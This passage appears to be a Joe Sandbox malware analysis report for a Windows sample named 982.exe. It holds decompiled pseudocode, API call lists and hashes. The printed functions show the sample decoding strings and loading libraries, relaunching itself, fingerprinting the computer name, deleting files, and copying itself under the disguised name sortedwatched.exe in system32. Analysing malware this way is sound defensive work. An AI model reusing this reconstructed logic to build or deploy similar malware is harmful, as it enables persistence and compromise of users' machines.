                  				_v300 = 0x99b717b5;
                  				_v296 = 0x350e7f98;
                  				_v292 = 0x6bebc19;
                  				_v288 = 0x26729ca6;
                  				_v284 = 0x85259ee2;
                  				_v280 = 0x4ff5a8b1;
                  				_v276 = 0x761762f3;
                  				_v272 = 0xe2377b6c;
                  				_v268 = 0xf606ea17;
                  				_v264 = 0x732cd514;
                  				_v260 = 0x95d9d9f6;
                  				_v256 = 0x4e1a0c62;
                  				_v252 = 0x2f571a4a;
                  				_v248 = 0xde7ffc35;
                  				_v244 = 0xc1baae08;
                  				_v240 = 0x330c550e;
                  				_v236 = 0xe51e9d38;
                  				_v232 = 0x5c7bafc;
                  				_v228 = 0xfede311;
                  				_v224 = 0x7bb4b589;
                  				_v220 = 0x49de023d;
                  				_v216 = 0x5746334b;
                  				_v212 = 0x47c5668e;
                  				_v208 = 0x20d356d6;
                  				_v204 = 0x468884d9;
                  				_v200 = 0xf1a3088;
                  				_v196 = 0x299cca75;
                  				_v192 = 0x7e0aef8c;
                  				_v188 = 0x36e551d0;
                  				_v184 = 0x48145815;
                  				_v180 = 0x79d6fd9e;
                  				_v176 = 0xcb924866;
                  				_v172 = 0x8efb6fa1;
                  				_v168 = 0xb926985e;
                  				_v164 = 0xa196ac7b;
                  				_v160 = 0xaeab18d4;
                  				_v156 = 0x78015c1f;
                  				_v152 = 0x5819869;
                  				_v148 = 0xcca218d0;
                  				_v144 = 0x7d06249f;
                  				_v140 = 0xf0a7edaa;
                  				_v136 = 0x6a004c;
                  				_v132 = 0xf9b9513f;
                  				_v128 = 0x741d919f;
                  				_v124 = 0x2ea3bc66;
                  				_v120 = 0xab1dc78a;
                  				_v116 = 0x74b6dbaa;
                  				_v112 = 0x7e81bfa1;
                  				_v108 = 0x4202d69c;
                  				_v104 = 0x38ce33a7;
                  				_v100 = 0x595e8000;
                  				_v96 = 0x290b2103;
                  				_v92 = 0xe4e40622;
                  				_v88 = 0xc8dd8e6f;
                  				_v84 = 0x4979097d;
                  				_v80 = 0xfee0d431;
                  				_v76 = 0xb9ce1ec8;
                  				_v72 = 0x67261b7e;
                  				_v68 = 0x4ae4b37a;
                  				_v64 = 0xf9871833;
                  				_v60 = 0x68a06f47;
                  				_v56 = 0xd195cac2;
                  				_v52 = 0x5f95137e;
                  				_v48 = 0xfcdb6acb;
                  				_v44 = 0x816238c4;
                  				_v40 = 0xafd25fa6;
                  				_v36 = 0xc5ef91f0;
                  				_v32 = 0x9fbd261a;
                  				_v28 = 0xfa1b3f6e;
                  				_v24 = 0x31581501;
                  				_v20 = 0x54d81d91;
                  				_v16 = 0xbe2861d0;
                  				_v12 = 0xb3163952;
                  				_v8 = 0x10e6581a;
                  				_t514 = E00401A52(0x4127b0, 0x72fc3a35);
                  				_t506 = LoadLibraryW(_t505); // executed
                  				 *0x4164e8 = _t506;
                  				L00401B09(_t514);
                  				_push(0x412e80);
                  				_push(0x2bf385b5);
                  				return E004012FF( *0x4164e8,  &_v2016, 0x1f7);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040768C
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: !i$'v#$-OQ3$0sN$6k4!$K3FW$L$THr$Tt)$U<([$YV7$[:}$^Kpt$l{7$m^$}yI$~~F$2=9$Q
                  • API String ID: 1029625771-1009886285
                  • Opcode ID: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction ID: 8b68394b666451bb9afb97b728dfcd24b1eb0b6c41965aaa66b61d789d097ed1
                  • Opcode Fuzzy Hash: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction Fuzzy Hash: 6992A5B0C4A7698FDBA18F429E8478DBA75FB41304F5086C8C25D3B215CB761AD2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 91%
                  			_entry_() {
                  				char _v20;
                  				short _v540;
                  				short _v1060;
                  				void* _t15;
                  				int _t21;
                  				WCHAR* _t25;
                  				void* _t38;
                  				WCHAR* _t39;
                  				WCHAR* _t43;
                  
                  				E0040CACE();
                  				E0040DB84();
                  				GetModuleFileNameW(0,  &_v1060, 0x104);
                  				_t15 = E00401144( &_v1060);
                  				_t38 = E00401A52(0x4129a0, 0x72fc3a35);
                  				 *0x4143a4( &_v540, 0x104, _t38, _t15);
                  				_t32 = _t38;
                  				L00401B09(_t38);
                  				_t39 = GetCommandLineW();
                  				_t21 = lstrlenW(_t39);
                  				_t43 =  &(_t39[_t21 - lstrlenW( &_v540)]);
                  				while(_t39 <= _t43) {
                  					_t25 = lstrcmpiW(_t39,  &_v540); // executed
                  					__eflags = _t25;
                  					if(__eflags != 0) {
                  						_t39 =  &(_t39[1]);
                  						__eflags = _t39;
                  						continue;
                  					}
                  					E0040C84E(0x104, _t32, _t39, __eflags); // executed
                  					ExitProcess(0); // executed
                  				}
                  				E00401CC2( &_v1060,  &_v540, _t32,  &_v20);
                  				ExitProcess(0);
                  			}













                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F097
                  • _snwprintf.NTDLL ref: 0040F0C5
                  • GetCommandLineW.KERNEL32 ref: 0040F0D5
                  • lstrlenW.KERNEL32(00000000), ref: 0040F0DE
                  • lstrlenW.KERNEL32(?), ref: 0040F0ED
                  • lstrcmpiW.KERNELBASE(00000000,?), ref: 0040F102
                  • ExitProcess.KERNEL32 ref: 0040F113
                    • Part of subcall function 00401CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • ExitProcess.KERNEL32 ref: 0040F13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                  • String ID: g8Cw
                  • API String ID: 4243820956-3103284439
                  • Opcode ID: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction ID: 96f63cbf6c12603b9eafb981d3b8471d0b236fe68b2e75c18f179b1aecd08856
                  • Opcode Fuzzy Hash: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction Fuzzy Hash: 5F118472600118ABD710AB65DC89AFF377CEB40349F00417AF505A7192EE346E458BA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F3C5() {
                  				void* _t1;
                  				void* _t2;
                  				int _t3;
                  				void* _t4;
                  				void* _t10;
                  				void* _t12;
                  				void* _t14;
                  
                  				_t1 = CreateFileW("C:\Users\luketaylor\982.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
                  				_t14 = _t1;
                  				if(_t14 != 0xffffffff) {
                  					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
                  					_t12 = _t2;
                  					if(_t12 != 0) {
                  						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
                  						_t10 = _t4;
                  						if(_t10 != 0) {
                  							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
                  							UnmapViewOfFile(_t10);
                  						}
                  						CloseHandle(_t12); // executed
                  					}
                  					_t3 = CloseHandle(_t14); // executed
                  					return _t3;
                  				}
                  				return _t1;
                  			}











                  APIs
                  • CreateFileW.KERNELBASE(C:\Users\user\982.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F434
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID: C:\Users\user\982.exe
                  • API String ID: 3664593344-486285761
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F3C5() {
                  				void* _t1;
                  				void* _t2;
                  				int _t3;
                  				void* _t4;
                  				void* _t10;
                  				void* _t12;
                  				void* _t14;
                  
                  				_t1 = CreateFileW(0x416c50, 0x80000000, 1, 0, 3, 0, 0); // executed
                  				_t14 = _t1;
                  				if(_t14 != 0xffffffff) {
                  					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
                  					_t12 = _t2;
                  					if(_t12 != 0) {
                  						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
                  						_t10 = _t4;
                  						if(_t10 != 0) {
                  							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
                  							UnmapViewOfFile(_t10);
                  						}
                  						CloseHandle(_t12); // executed
                  					}
                  					_t3 = CloseHandle(_t14); // executed
                  					return _t3;
                  				}
                  				return _t1;
                  			}











                  APIs
                  • CreateFileW.KERNELBASE(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F434
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID:
                  • API String ID: 3664593344-0
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Control-flow Graph

                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
                  				char _v524;
                  				char _v1044;
                  				short _v1564;
                  				char* _t17;
                  				int _t27;
                  				void* _t45;
                  				intOrPtr _t48;
                  
                  				_t42 = E00401A52(0x412a00, 0x4bf67e71);
                  				E0040F190( &_v1044, _t9);
                  				L00401B09(_t42);
                  				_push( &_v524);
                  				_push(0);
                  				_push(0);
                  				_t48 =  *0x415f4c; // 0x1
                  				if(_t48 == 0) {
                  					 *0x414c14(0, 0x1c);
                  					_t43 = E00401A52(0x412df0, 0x4bf67e71);
                  					_t17 =  &_v524;
                  					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
                  					_t45 = _t45 + 0x14;
                  					L00401B09(_t43);
                  				} else {
                  					 *0x414c14(0, 0x29);
                  				}
                  				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
                  				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
                  				L00401B09(_t44);
                  				_t27 = DeleteFileW( &_v1564); // executed
                  				return _t27;
                  			}











                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040F347
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 1341198303-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 107 40f43e-40f45c GetComputerNameW 108 40f4c8 107->108 109 40f45e-40f498 call 4019ab WideCharToMultiByte call 401b09 107->109 110 40f4ce-40f503 call 4019ab _snprintf call 401b09 108->110 109->108 118 40f49a-40f4a1 109->118 118->110 120 40f4a3-40f4a7 118->120 121 40f4a9-40f4ab 120->121 122 40f4ad-40f4af 120->122 121->122 123 40f4c0-40f4c4 121->123 124 40f4b1-40f4b3 122->124 125 40f4b5-40f4b7 122->125 123->120 128 40f4c6 123->128 124->123 124->125 126 40f4b9-40f4bb 125->126 127 40f4bd 125->127 126->123 126->127 127->123 128->110
                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
                  				long _v8;
                  				char _v24;
                  				short _v56;
                  				int _t14;
                  				void* _t15;
                  				int _t22;
                  				char _t24;
                  				char* _t33;
                  
                  				_v8 = 0x10;
                  				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
                  				if(_t14 == 0) {
                  					L12:
                  					_v24 = 0x58;
                  					L13:
                  					_t15 = E004019AB(0x412e30);
                  					 *0x414664("813848_3C4E0000", 0x104, _t15,  &_v24,  *0x4164e0);
                  					return L00401B09(_t15);
                  				}
                  				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
                  				L00401B09(_t19);
                  				if((0 | _t22 > 0x00000000) == 0) {
                  					goto L12;
                  				}
                  				_t33 =  &_v24;
                  				if(_v24 == 0) {
                  					goto L13;
                  				} else {
                  					goto L3;
                  				}
                  				do {
                  					L3:
                  					_t24 =  *_t33;
                  					if(_t24 < 0x30 || _t24 > 0x39) {
                  						if(_t24 < 0x61 || _t24 > 0x7a) {
                  							if(_t24 < 0x41 || _t24 > 0x5a) {
                  								 *_t33 = 0x58;
                  							}
                  						}
                  					}
                  					_t33 = _t33 + 1;
                  				} while ( *_t33 != 0);
                  				goto L13;
                  			}












                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: 813848_3C4E0000$X
                  • API String ID: 4080658169-2762417543
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 12.89%

                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                  				short _v524;
                  				void* _t7;
                  				WCHAR* _t34;
                  
                  				_t34 = 0; // executed
                  				E00401000(); // executed
                  				_t7 = E0040108B(0x416c50, 0x416840); // executed
                  				if(_t7 == 0) {
                  					E00401503( &_v524, 0x104);
                  					GetTempPathW(0x104,  &_v524);
                  					GetTempFileNameW( &_v524, 0, 0,  &_v524);
                  					if(E0040108B(0x416840,  &_v524) != 0) {
                  						_t34 = E0040108B(0x416c50, 0x416840);
                  						_t38 = _t34;
                  						if(_t34 == 0) {
                  							E0040108B( &_v524, 0x416840); // executed
                  						}
                  					}
                  				}
                  				E004010DC(_t38); // executed
                  				return _t34;
                  			}







                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                    • Part of subcall function 0040108B: SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?,0040F65D,00416840,00000104), ref: 004010C2
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Temp$AttributesCreateDirectoryErrorLastNameOperationPathmemset
                  • String ID: @hA$PlA$PlA
                  • API String ID: 130228747-2032501620
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040C601(void* __eflags) {
                  				void* _t1;
                  				long _t3;
                  				void* _t4;
                  				long _t8;
                  				int _t13;
                  
                  				_t13 = 0; // executed
                  				_t1 = E0040C4F5(__eflags); // executed
                  				if(_t1 == 0) {
                  					L10:
                  					return _t13;
                  				}
                  				_t3 = WaitForSingleObject( *0x41548c, 0);
                  				if(_t3 == 0) {
                  					L3:
                  					_t4 = E0040C54E(_t17); // executed
                  					_t18 = _t4;
                  					if(_t4 != 0 && E0040C5A7(_t18) != 0) {
                  						_t8 = SignalObjectAndWait( *0x414e6c,  *0x41365c, 0xffffffff, _t13);
                  						if(_t8 == 0 || _t8 == 0x80) {
                  							_t13 = ResetEvent( *0x414e6c);
                  						}
                  					}
                  					ReleaseMutex( *0x41548c);
                  					CloseHandle( *0x41548c); // executed
                  					L9:
                  					goto L10;
                  				}
                  				_t17 = _t3 - 0x80;
                  				if(_t3 != 0x80) {
                  					goto L9;
                  				}
                  				goto L3;
                  			}









                  APIs
                    • Part of subcall function 0040C4F5: _snwprintf.NTDLL ref: 0040C51D
                    • Part of subcall function 0040C4F5: CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040C535
                  • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                  • ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                  • ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                  • CloseHandle.KERNELBASE ref: 0040C677
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle_snwprintf
                  • String ID:
                  • API String ID: 2255288334-0
                  • Opcode ID: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction ID: c0f7c5306684621e6a4500821fb11e6ef7d6b4f9c1040e922aa21da158988458
                  • Opcode Fuzzy Hash: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction Fuzzy Hash: 6AF03631544110DBDF312F76FC48A9A7A55AB45752714C736F801E12F0EA36C9109A5C
                  Uniqueness

                  Uniqueness Score: 0.01%

                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
                  				long _v8;
                  				char _v24;
                  				short _v56;
                  				int _t14;
                  				void* _t15;
                  				int _t22;
                  				char _t24;
                  				char* _t33;
                  
                  				_v8 = 0x10;
                  				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
                  				if(_t14 == 0) {
                  					L12:
                  					_v24 = 0x58;
                  					L13:
                  					_t15 = E004019AB(0x412e30);
                  					 *0x414664(0x416738, 0x104, _t15,  &_v24,  *0x4164e0);
                  					return L00401B09(_t15);
                  				}
                  				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
                  				L00401B09(_t19);
                  				if((0 | _t22 > 0x00000000) == 0) {
                  					goto L12;
                  				}
                  				_t33 =  &_v24;
                  				if(_v24 == 0) {
                  					goto L13;
                  				} else {
                  					goto L3;
                  				}
                  				do {
                  					L3:
                  					_t24 =  *_t33;
                  					if(_t24 < 0x30 || _t24 > 0x39) {
                  						if(_t24 < 0x61 || _t24 > 0x7a) {
                  							if(_t24 < 0x41 || _t24 > 0x5a) {
                  								 *_t33 = 0x58;
                  							}
                  						}
                  					}
                  					_t33 = _t33 + 1;
                  				} while ( *_t33 != 0);
                  				goto L13;
                  			}












                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: X
                  • API String ID: 4080658169-3081909835
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 0.17%

                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
                  				char _v524;
                  				char _v1044;
                  				short _v1564;
                  				char* _t17;
                  				int _t27;
                  				void* _t45;
                  				intOrPtr _t48;
                  
                  				_t42 = E00401A52(0x412a00, 0x4bf67e71);
                  				E0040F190( &_v1044, _t9);
                  				L00401B09(_t42);
                  				_push( &_v524);
                  				_push(0);
                  				_push(0);
                  				_t48 =  *0x415f4c; // 0x0
                  				if(_t48 == 0) {
                  					 *0x414c14(0, 0x1c);
                  					_t43 = E00401A52(0x412df0, 0x4bf67e71);
                  					_t17 =  &_v524;
                  					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
                  					_t45 = _t45 + 0x14;
                  					L00401B09(_t43);
                  				} else {
                  					 *0x414c14(0, 0x29);
                  				}
                  				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
                  				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
                  				L00401B09(_t44);
                  				_t27 = DeleteFileW( &_v1564); // executed
                  				return _t27;
                  			}











                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 3875729096-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                  				short _v524;
                  				void* _t7;
                  				WCHAR* _t34;
                  
                  				_t34 = 0; // executed
                  				E00401000(); // executed
                  				_t7 = E0040108B(0x416c50, 0x416840); // executed
                  				if(_t7 == 0) {
                  					E00401503( &_v524, 0x104);
                  					GetTempPathW(0x104,  &_v524);
                  					GetTempFileNameW( &_v524, 0, 0,  &_v524);
                  					if(E0040108B(0x416840,  &_v524) != 0) {
                  						_t34 = E0040108B(0x416c50, 0x416840);
                  						_t38 = _t34;
                  						if(_t34 == 0) {
                  							E0040108B( &_v524, 0x416840); // executed
                  						}
                  					}
                  				}
                  				E004010DC(_t38); // executed
                  				return _t34;
                  			}







                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                    • Part of subcall function 0040108B: SHFileOperationW.SHELL32(?), ref: 004010C2
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Temp$AttributesCreateDirectoryErrorLastNameOperationPathmemset
                  • String ID: C:\Users\user\982.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 130228747-3515039387
